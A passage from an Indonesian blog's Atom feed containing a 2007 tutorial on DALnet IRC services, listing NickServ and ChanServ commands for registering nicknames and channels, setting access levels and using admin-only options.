type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2255862731443524123'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2255862731443524123'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/trik-menggunakan-mesin-pencari-google.html' title='Trik Menggunakan Mesin Pencari Google'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-5041708267177153957</id><published>2007-07-27T20:47:00.000+07:00</published><updated>2007-07-27T21:38:11.329+07:00</updated><title type='text'>Sedikit Tutor tentang IRC - Dalnet Server</title><content type='html'>&lt;p style="margin-bottom: 0in;"&gt;NickServ&lt;br /&gt;&lt;br /&gt;Nickname Services (NICKSERV)&lt;br /&gt;&lt;br /&gt;1. NickServ&lt;br /&gt;Adalah suatu service yang memungkinkan anda untuk mendaftarkan nickname kesayangan anda, sehingga tidak dapat dipakai lagi selain anda sendiri, walaupun anda tidak sedang online.&lt;br /&gt;&lt;br /&gt;Jika nickname yang telah di daftarkan tidak digunakan selama lebih dari 30 hari, maka nickname itu akan di hapus dari daftar dan orang lain diijinkan untuk mendaftarkan dan memakainya. Nickname yang telah didaftarkan akan dilindungi oleh password.&lt;br /&gt;&lt;br /&gt;a. REGISTER&lt;br /&gt;&lt;br /&gt;Perintah : /msg NICKSERV REGISTER .&lt;br /&gt;&lt;br /&gt;Register : Untuk mendaftarkan suatu nickname&lt;br /&gt;&lt;br /&gt;b. DROP&lt;br /&gt;&lt;br /&gt;Drop : Untuk membatalkan pendaftaran suatu nickname&lt;br /&gt;&lt;br /&gt;Perintah : /msg NICKSERV DROP&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;c. IDENTIFY&lt;br /&gt;&lt;br /&gt;Identify : Untuk meminta otorisasi penggunaan nick&lt;br /&gt;&lt;br /&gt;Perintah :/msg nickserv identify&lt;br /&gt;&lt;br /&gt;d. SET&lt;br /&gt;&lt;br /&gt;Set : Untuk memodifikasi fungsi-fungsi keamanan atas nickname tersebut. Command ini mempunya beberapa pilihan, seperti :&lt;br /&gt;&lt;br /&gt;KILL : mengaktifkan kill jika nick digunakan orang lain&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set kill on&lt;br /&gt;&lt;br /&gt;Yang menggunakan nick lain akan di kill jika gagal memberikan password&lt;br /&gt;&lt;br /&gt;Dalam 30 detik, walaupun hostnya sama&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/msg nickserv set kill immed&lt;br /&gt;&lt;br /&gt;immed = immediately, pengguna nick akan langsung dikill kalau hostnya&lt;br /&gt;&lt;br /&gt;tidak sama&lt;br /&gt;&lt;br /&gt;AUTOMASK&lt;br /&gt;&lt;br /&gt;AUTOMASK : membuat nickserv menambahkan host secara otomatis jika hostnya&lt;br /&gt;&lt;br /&gt;belum terdaftar dalam access list, dengan syarat password benar&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set automask ON&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PASSWORD&lt;br /&gt;&lt;br /&gt;Mengganti password untuk identify&lt;br /&gt;&lt;br /&gt;Contoh : /msg nickserv set password&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OPER&lt;br /&gt;&lt;br /&gt;OPER : membuat nick terdaftar tidak dihapus bila lebih dari 30 hari tidak&lt;br /&gt;&lt;br /&gt;dipakai ( KHUSUS IRC Op )&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set oper on&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SECURE :&lt;br /&gt;&lt;br /&gt;SECURE : untuk membuat anda langsung dikenali bila host dan ident sama&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set secure on&lt;br /&gt;&lt;br /&gt;Dalam keadaan off, anda tidak perlu identify bila akan menggunakan&lt;br /&gt;&lt;br /&gt;nick asal host dan ident anda masuk daftar akses. Jika ada orang lain&lt;br /&gt;&lt;br /&gt;yang memakai, mereka tidak akan di kill. Tetapi tidak bisa mengakses&lt;br /&gt;&lt;br /&gt;perintah bila belum identify&lt;br /&gt;&lt;br /&gt;UNSECURE&lt;br /&gt;&lt;br /&gt;UNSECURE : untuk membuat nick anda terdaftar tapi tanpa membutuhkan&lt;br /&gt;&lt;br /&gt;password akses&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set unsecure&lt;br /&gt;&lt;br /&gt;PRIVATE&lt;br /&gt;&lt;br /&gt;PRIVATE : membuat nick yang terdaftar tidak terlihat saat dilakukan pencarian&lt;br /&gt;&lt;br /&gt;dengan list ( /msg nickserv list )&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set private&lt;br /&gt;&lt;br /&gt;MEMOS&lt;br /&gt;&lt;br /&gt;MEMOS : mengijinkan menerima pesan singkat dari orang lain melalui MemoServ&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set memos&lt;br /&gt;&lt;br /&gt;NOTIFY&lt;br /&gt;&lt;br /&gt;NOTIFY : dalam keadaan online, memoserv akan memberi tahu jika ada pesan&lt;br /&gt;&lt;br /&gt;Masuk&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set notify on&lt;br /&gt;&lt;br /&gt;SIGNON&lt;br /&gt;&lt;br /&gt;SIGNON : jika sedang offline ada pesan masuk, maka saat online, anda akan&lt;br /&gt;&lt;br /&gt;Diberitahu ada pesan baru di memoserv&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set signon on&lt;br /&gt;&lt;br /&gt;EMAIL : menampilkan email anda pada info nickname anda&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set email&lt;br /&gt;MASTER&lt;br /&gt;&lt;br /&gt;MASTER : bila anda memakai nick ( bukan IP address ) sebagai access id anda&lt;br /&gt;&lt;br /&gt;Maka akan ada banyak nick yang terdaftar, fungsi ini membuat salah satu&lt;br /&gt;&lt;br /&gt;Nick menjadi nick utama ( yang paling sering digunakan )&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set master&lt;br /&gt;&lt;br /&gt;URL&lt;br /&gt;&lt;br /&gt;URL menampilkan alamat web site / homepage anda pada info nickname&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set url&lt;br /&gt;&lt;br /&gt;HIDE&lt;br /&gt;&lt;br /&gt;Menyembunyikan info anda pada nickserv&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv set hide&lt;br /&gt;&lt;br /&gt;e. LIST&lt;br /&gt;&lt;br /&gt;LIST : Untuk menampilkan nama-nama yang telah terdaftar ( tanpa info )&lt;br /&gt;&lt;br /&gt;Cara : /msg nickserv list&lt;br /&gt;&lt;br /&gt;Contoh /msg nickserv list *aji*&lt;br /&gt;&lt;br /&gt;Maka akan ditampilkan nama-nama terdaftar yang mengandung aji,&lt;br /&gt;&lt;br /&gt;Misalnya : ajian, gergaji, bajingan  &lt;img src="http://forum.newhack.org/images/smiles/icon_smile.gif" name="graphics4" alt="Smile" align="bottom" border="0" height="15" width="15" /&gt;&lt;br /&gt;&lt;br /&gt;/msg nickserv list *&lt;br /&gt;&lt;br /&gt;maka akan ditampilkan seluruh nama ! hal ini akan memakan waktu sangat&lt;br /&gt;&lt;br /&gt;bahkan mungkin bisa membuat anda menjadi disconnect !&lt;br /&gt;&lt;br /&gt;f. RECOVER&lt;br /&gt;&lt;br /&gt;RECOVER : Untuk membuat disconnect orang lain yang memakai nick anda&lt;br /&gt;&lt;br /&gt;Cara :/msg nickserv recover&lt;br /&gt;&lt;br /&gt;g. RELEASE&lt;br /&gt;&lt;br /&gt;RELEASE : Untuk menghilangkan clone yang dibuat NickServ&lt;br /&gt;&lt;br /&gt;Cara :/msg nickserv release&lt;br /&gt;&lt;br /&gt;Ketika anda memberikan perintah RECOVER, maka nickserv akan kill&lt;br /&gt;&lt;br /&gt;Nick yang anda masukkan, kemudian membuat clone atas nick tersebut&lt;br /&gt;&lt;br /&gt;selama 1 menit.&lt;br /&gt;&lt;br /&gt;Perintah release akan menghilangkan clone itu sebelum 1 menit&lt;br /&gt;&lt;br /&gt;Sehingga anda Dapat segera memakai nick anda.&lt;br /&gt;&lt;br /&gt;h. GHOST&lt;br /&gt;&lt;br /&gt;GHOST : Untuk menghilangkan nick yang masih online setelah disconnect&lt;br /&gt;&lt;br /&gt;Cara :/msg nickserv ghost&lt;br /&gt;&lt;br /&gt;Ketika anda disconnect secara abnormal, mungkin nick anda masih&lt;br /&gt;&lt;br /&gt;Online dengan tersimpan di buffer saat anda connect kembali.&lt;br /&gt;i. INFO&lt;br /&gt;&lt;br /&gt;INFO : untuk melihat keterangan suatu nick&lt;br /&gt;&lt;br /&gt;Cara :/msg nickserv info&lt;br /&gt;&lt;br /&gt;Akan menampilkan informasi mengenai nick tertentu, status Online atau&lt;br /&gt;&lt;br /&gt;Offline kemudian, berapa lama telah teregistrasi, pesan quit terakhir dll&lt;br /&gt;&lt;br /&gt;j. LINK&lt;br /&gt;&lt;br /&gt;LINK : untuk membuat nick lain berhubungan dengan nick Anda&lt;br /&gt;&lt;br /&gt;Cara :/msg nickserv link&lt;br /&gt;&lt;br /&gt;Bila misalnya ada dua atau lebih nick yang teregistrasi, misalnya saat ini&lt;br /&gt;&lt;br /&gt;Memakai nick X dan ingin membuat nick Y berhubungan dengan&lt;br /&gt;&lt;br /&gt;Nick X.&lt;br /&gt;&lt;br /&gt;Bila telah link, maka bila salah satu identifikasi dengan password yang&lt;br /&gt;&lt;br /&gt;Benar, maka yang lain akan otomatis terotorisasi. Bila ada pesan ke&lt;br /&gt;&lt;br /&gt;Salah satu nick, nick yang lain akan diberi tahu.&lt;br /&gt;&lt;br /&gt;k. UNLINK&lt;br /&gt;&lt;br /&gt;UNLINK : untuk membuat nick menjadi independen&lt;br /&gt;&lt;br /&gt;Cara :/msg nickserv unlink&lt;br /&gt;&lt;br /&gt;Command khusus yang hanya bisa digunakan oleh Admin&lt;br /&gt;&lt;br /&gt;1. SETPASS (Admin Only) : digunakan untuk melakukan penggatian password user. Hati-hati dengan command ini, karena user bisa saja meminta Admin untuk melakukan penggantian password nickname yang bukan milik mereka&lt;br /&gt;&lt;br /&gt;/msg nickserv setpass&lt;br /&gt;&lt;br /&gt;2. DROPLINK (Admin Only) : digunakan untuk melepaskan linkname dari user. Resiko dari command ini adalah, user yang terkena droplink, maka nickname mereka akan unregister dari nickserv&lt;br /&gt;&lt;br /&gt;/msg nickserv droplink&lt;br /&gt;&lt;br /&gt;3. NOEXPIRE (Admin Only) : digunakan untuk membuat nickname tersebut tidak pernah expire (lihat juga DROP)&lt;br /&gt;&lt;br /&gt;/msg nickserv noexpire&lt;br /&gt;&lt;br /&gt;4. FORBID (Admin Only) : mencegah user untuk menggunakan suatu nickname, dengan kata lain, nickname tersebut tidak bisa dipergunakan oleh user biasa (lihat juga DROP)&lt;br /&gt;&lt;br /&gt;/msg nickserv forbid&lt;br /&gt;&lt;br /&gt;Perintah ChanServ&lt;br /&gt;PERINTAH CHANSERV&lt;br /&gt;&lt;br /&gt;1. REGISTER&lt;br /&gt;&lt;br /&gt;2. DROP&lt;br /&gt;&lt;br /&gt;3. IDENTIFY&lt;br /&gt;&lt;br /&gt;4. SET&lt;br /&gt;&lt;br /&gt;A.FOUNDER&lt;br /&gt;&lt;br /&gt;B.SUCESSOR&lt;br /&gt;&lt;br /&gt;C.PASSWORD&lt;br /&gt;&lt;br /&gt;D.MLOCK&lt;br /&gt;&lt;br /&gt;E.TOPIC&lt;br /&gt;&lt;br /&gt;F.TOPICLOCK&lt;br /&gt;&lt;br /&gt;G.PRIVAT&lt;br /&gt;&lt;br /&gt;H.SECUREOPS&lt;br /&gt;&lt;br /&gt;I.RETRISTIC&lt;br /&gt;&lt;br /&gt;5. REPLAY&lt;br /&gt;&lt;br /&gt;6. DEL&lt;br /&gt;&lt;br /&gt;7. FORBID&lt;br /&gt;&lt;br /&gt;8. SETPASS&lt;br /&gt;&lt;br /&gt;9. STATUS&lt;br /&gt;&lt;br /&gt;10. FORGET&lt;br /&gt;&lt;br /&gt;11. NOEXPIRE&lt;br /&gt;&lt;br /&gt;ChanServ&lt;br /&gt;&lt;br /&gt;Chanserv memungkinkan anda untuk meregister dan mengontrol berbagai macam aspek dalam channel.&lt;br /&gt;&lt;br /&gt;Chanserv juga dapat melindungi user dari usaha pengambilalihan channel dengan memberikan batasan siapa saja yang diperbolehkan menjadi channel operator. Banyak channel...yang tidak dipergunakan dalam jangka waktu 2 minggu, akan secara otomatis akan dibatalkan/dihapus secara otomatis. Perintah Chanserv dapat dilihat seperti dibawah ini:&lt;br /&gt;&lt;br /&gt;type....untuk memperoleh informasi untuk satu perintah, ketik .... /msg ChanServ help .&lt;br /&gt;&lt;br /&gt;REGISTER : Register a channel&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ Register&lt;br /&gt;&lt;br /&gt;Contoh : /msg ChanServ Register #testing percobaan&lt;br /&gt;&lt;br /&gt;Meregister channel pada chanserv database...dan password. Password diperlukan agar anda dapat melakukan identifikasi kembali di waktu berikutnya agar operator...dapat mengganti setting dari channel....anda harus menjadi seorang channel operator pada channel yang anda inginkan untu diregister. Sekali anda meregister sebuah channel...anda akan secara otomatis dikenal dan diberikan access sebagai pendiri channel anda dapat memberikan kepada anggota channel lainnya akses terbatas untuk , dan ditambahkan kepada daftar access sebagai super operator menjadi AOP di channel anda dengan menggunakan perintah access pada saat anda akan meregister channel anda pertama kali harus meregister. nick anda dengan nickserv apabila nick pendiri channel telah kadaluarsa/expired atau drop maka channel yang telah diregister juka akan drop/terhapus, juga apabila tidak seorangpun yang ada pada mengunjungi channel setidak-tidaknya satu kali dalam 2 minggu, maka channel akan secara otomatis drop /terhapus.&lt;br /&gt;&lt;br /&gt;DROP&lt;br /&gt;&lt;br /&gt;&lt;&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg chanserv drop [password]&lt;br /&gt;&lt;br /&gt;membatalkan registrasi channel pendiri channel dapat men DROP sebuah channel, pendiri harus melakukan identify terlebih dahulu dengan menggunakan perintah atau mengisi password channel&lt;br /&gt;&lt;br /&gt;IDENTIFY&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah /msg ChanServ Identify password&lt;br /&gt;&lt;br /&gt;Mengidnetifikasi anda sebagai pendiri channel banyak perintah chanserv yang membutuhkan identify sebelum anda menggunakannya.&lt;br /&gt;&lt;br /&gt;SET&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg Chanserv Set [option] {isi}&lt;br /&gt;&lt;br /&gt;Contoh : /msg Chanserv set #bawel founder diMas&lt;br /&gt;&lt;br /&gt;/msg Chanserv set #bawel succersor off&lt;br /&gt;&lt;br /&gt;/msg Chanserv set #bawel password segogudeg&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel mlock off&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel topic --+++ Channel Paling Bawel Se A-Net ++----&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel topiclock off&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel privat off&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel secureops on&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel restricted on&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel entrymsg Selamat datang GEROMBOLAN Si- berat&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel email &lt;a href="mailto:bawel@indonet.com"&gt;bawel@indonet.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel url &lt;a href="http://members.tripod.com/web-bawel" target="_blank"&gt;http://members.tripod.com/web-bawel&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel forget on&lt;br /&gt;&lt;br /&gt;/msg ChanServ set #bawel guard off&lt;br /&gt;&lt;br /&gt;A. FOUNDER&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg Chanserv set #bawel founder diMas&lt;br /&gt;&lt;br /&gt;B. SUCCESSOR&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg Chanserv set #bawel succersor off atau on&lt;br /&gt;&lt;br /&gt;C. PASSWORD&lt;br /&gt;&lt;br /&gt;&lt;.mengeset password pendiri channel&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg Chanserv set #bawel password segogudeg&lt;br /&gt;&lt;br /&gt;D. MLOCK&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel mlock off&lt;br /&gt;&lt;br /&gt;E.TOPIC&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel topic --+++ Channel Paling Bawel Se A-Net ++----&lt;br /&gt;&lt;br /&gt;F. TOPICLOCK&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel topiclock on atau off&lt;br /&gt;&lt;br /&gt;G. PRIVATE&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel private off atau on&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;H. SECUREOPS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel secureops off atau on&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I. RESTRICTED&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel restricted on&lt;br /&gt;&lt;br /&gt;J. SECURE&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel secure off atau on&lt;br /&gt;&lt;br /&gt;ENTRYMSG&lt;br /&gt;&lt;br /&gt;&lt;&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel entrymsg Selamat datang GEROMBOLAN Si- berat&lt;br /&gt;&lt;br /&gt;EMAIL&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel email &lt;a href="mailto:bawel@indonet.com"&gt;bawel@indonet.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;URL&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel url &lt;a href="http://members.tripod.com/web-bawel" target="_blank"&gt;http://members.tripod.com/web-bawel&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;FORGET&lt;br /&gt;&lt;br /&gt;&lt;&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel forget on atau off&lt;br /&gt;&lt;br /&gt;GUARD&lt;br /&gt;&lt;br /&gt;&lt;&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ set #bawel guard off atau on&lt;br /&gt;&lt;br /&gt;ACCESS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perintah /msg ChanServ ACCESS ADD&lt;br /&gt;&lt;br /&gt;/msg ChanServ ACCESS DEL&lt;br /&gt;&lt;br /&gt;/msg ChanServ ACCESS LIST [mask]&lt;br /&gt;&lt;br /&gt;user yang cocok dengan hostmask yang terdapat pada daftar akses akan dapat&lt;br /&gt;memiliki akses kepada macam-macam command chanserv tergantung kepada..&lt;br /&gt;level yang mereka miliki semua yang tidak terdaftar akan memiliki akses 0&lt;br /&gt;Anda coba perintah /msg ChanServ HELP ACCESS {ADD|DEL|LIST} perintah tersebut untuk..informasi pada setiap perintah.&lt;br /&gt;&lt;br /&gt;AKICK&lt;br /&gt;&lt;br /&gt;&lt;&gt;&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ AKICK ADD [pesan]&lt;br /&gt;&lt;br /&gt;/msg ChanServ AKICK DEL&lt;br /&gt;&lt;br /&gt;/msg ChanServ AKICK LIST [mask]&lt;br /&gt;&lt;br /&gt;membuat perintah auto kick list jika seorang user yang terdapat pada outokick list melakukan perintah join kembali/auto join... maka chanserv akan melakukan kick/ban user tsb atau anda bisa coba lebih lanjut dengan perintah /msg ChanServ HELP AKICK {ADD|DEL|LIST}&lt;br /&gt;&lt;br /&gt;LEVEL&lt;br /&gt;&lt;br /&gt;LEVEL : Mengganti level yang diperlukan untuk memfungsikan fungsi dibawah ini (channel option)&lt;br /&gt;&lt;br /&gt;Perintah /msg chanserv help level&lt;br /&gt;&lt;br /&gt;Syntax: /msg chanserv LEVEL SET&lt;br /&gt;&lt;br /&gt;/msg chanserv LEVEL RESET&lt;br /&gt;&lt;br /&gt;/msg chanserv LEVEL LIST&lt;br /&gt;&lt;br /&gt;mengganti access level yang dibutuhkan untuk melakukan beberapa command, seorang pendiri channel dapat mengeset pada channnel masing-masing&lt;br /&gt;&lt;br /&gt;contoh :&lt;br /&gt;&lt;br /&gt;/msg ChanServ HELP LEVEL {SET|RESET|LIST}&lt;br /&gt;&lt;br /&gt;Keterangan Peringkat Level (baca =Tingkat) di Suatu Channel&lt;br /&gt;&lt;br /&gt;Misal :&lt;br /&gt;&lt;br /&gt;Access Levels for [#bawel] --&lt;br /&gt;&lt;br /&gt;Indeks , Fungsi , dari beberapa Peringkat Deskripsi&lt;br /&gt;&lt;br /&gt;Tingkat 1 AUTODEOP Otomatis penurunan deop / op dan pemberian voice dan devoice&lt;br /&gt;Tingkat 5 AUTOVOICE Otomatis voice&lt;br /&gt;Tingkat 5 CMDVOICE perintah set VOICE&lt;br /&gt;Tingkat 5 ACCESS Memodifikasi access level&lt;br /&gt;Tingkat 5 CMDINVITE perintah untuk INVITE&lt;br /&gt;Tingkat 10 AUTOOP Otomatis op&lt;br /&gt;Tingkat 10 CMDOP perintah untuk OP&lt;br /&gt;Tingkat 10 CMDUNBAN perintah UNBAN&lt;br /&gt;Tingkat 15 AUTOKICK Memodifikasi perintah (command ) AKICK&lt;br /&gt;Tingkat 20 CMDCLEAR Menghapus / menghilangkan semua mode&lt;br /&gt;Tingkat 25 SET Memodifikasi channel dengan perintah (command )&lt;br /&gt;&lt;br /&gt;SETs&lt;br /&gt;&lt;br /&gt;Tingkat 40 SUPEROP Semua perintah diatas dapat di gunakan pada level 40&lt;br /&gt;&lt;br /&gt;LIST&lt;br /&gt;&lt;br /&gt;LIST : melihat isi (mendisplay) daftar dari channel-channel yang cocok dengan pattern yang kita ketik&lt;br /&gt;&lt;br /&gt;Contoh Perintahnya : LIST&lt;br /&gt;&lt;br /&gt;mengeluarkan seluruh channel yang telah diregister dalam suatu daftar channel yang telah diset private akan tidak ditampilkan dalam daftar&lt;br /&gt;&lt;br /&gt;Contoh : LIST *bleh* /msg ChanServ list&lt;br /&gt;&lt;br /&gt;Artinya melihat semua Lists dengan awal kata bleh&lt;br /&gt;&lt;br /&gt;INFO&lt;br /&gt;&lt;br /&gt;INFO : melihat isi (mendisplay) informasi dari sebuah channel&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ info&lt;br /&gt;&lt;br /&gt;INVITE&lt;br /&gt;&lt;br /&gt;INVITE : mengundang (invite) diri anda sendiri ke channel lain&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ invite diMas&lt;br /&gt;&lt;br /&gt;OP&lt;br /&gt;&lt;br /&gt;OP : menjadikan diri anda sendiri Operator di Channel aktif&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ op atau deop Perintah : /msg ChanServ info&lt;br /&gt;&lt;br /&gt;VOICE&lt;br /&gt;&lt;br /&gt;Voice : Mengubah nick anda sendiri dengan + nick di channel yang aktif&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ voice nick&lt;br /&gt;&lt;br /&gt;UNBAN&lt;br /&gt;&lt;br /&gt;UNBAN : mengaktifkan kembali diri anda sendiri / orang lain untuk aktif di suatu channel&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ unban nick&lt;br /&gt;&lt;br /&gt;CLEAR&lt;br /&gt;&lt;br /&gt;CLEAR menghapus beberapa mode dari channel yang telah dibuat.&lt;br /&gt;&lt;br /&gt;Perintah : /msg ChanServ clear&lt;br /&gt;&lt;br /&gt;Admin Only J&lt;br /&gt;&lt;br /&gt;1. FORBID&lt;br /&gt;&lt;br /&gt;FORBID : membuat suatu channel tidak bisa dimasuki oleh user. Jika user masuk ke dalam channel tersebut, maka otomatis user akan kena kickban&lt;br /&gt;&lt;br /&gt;Perintah : /msg chanserv forbid&lt;br /&gt;&lt;br /&gt;Untuk membatalkan forbid, digunakan perintah : /msg chanserv drop&lt;br /&gt;&lt;br /&gt;2. SETPASS&lt;br /&gt;&lt;br /&gt;SETPASS : digunakan untuk mengganti password founder channel&lt;br /&gt;&lt;br /&gt;Perintah : /msg chanserv setpass&lt;br /&gt;&lt;br /&gt;3. STATUS&lt;br /&gt;&lt;br /&gt;STATUS : digunakan untuk melihat akses level yang dimiliki oleh user di suatu channel&lt;br /&gt;&lt;br /&gt;Perintah : /msg chanserv status&lt;br /&gt;&lt;br /&gt;4. FORGET&lt;br /&gt;&lt;br /&gt;FORGET : digunakan untuk membuat suatu channel menjadi tidak ada eksistensinya. User bisa masuk ke channel tersebut, tetapi tidak bisa meregister channel tersebut&lt;br /&gt;&lt;br /&gt;Perintah : /msg chanserv forget&lt;br /&gt;&lt;br /&gt;5. NOEXPIRE&lt;br /&gt;&lt;br /&gt;NOEXPIRE : digunakan untuk membuat status suatu channel tidak “expire”. Untuk membatalkan digunakan perintah drop&lt;br /&gt;&lt;br /&gt;Perintah : /msg chanserv noexpire [on/off]&lt;br /&gt;&lt;br /&gt;.::. refrensi : &lt;a href="http://noc.cbn.net.id/" target="_blank"&gt;http://noc.cbn.net.id&lt;/a&gt;&lt;/p&gt; &lt;p align="justify"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt; &lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt; &lt;p align="justify"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-5041708267177153957?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5041708267177153957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5041708267177153957'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/07/sedikit-tutor-tentang-irc-dalnet-server.html' title='Sedikit Tutor tentang IRC - Dalnet Server'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry></feed>
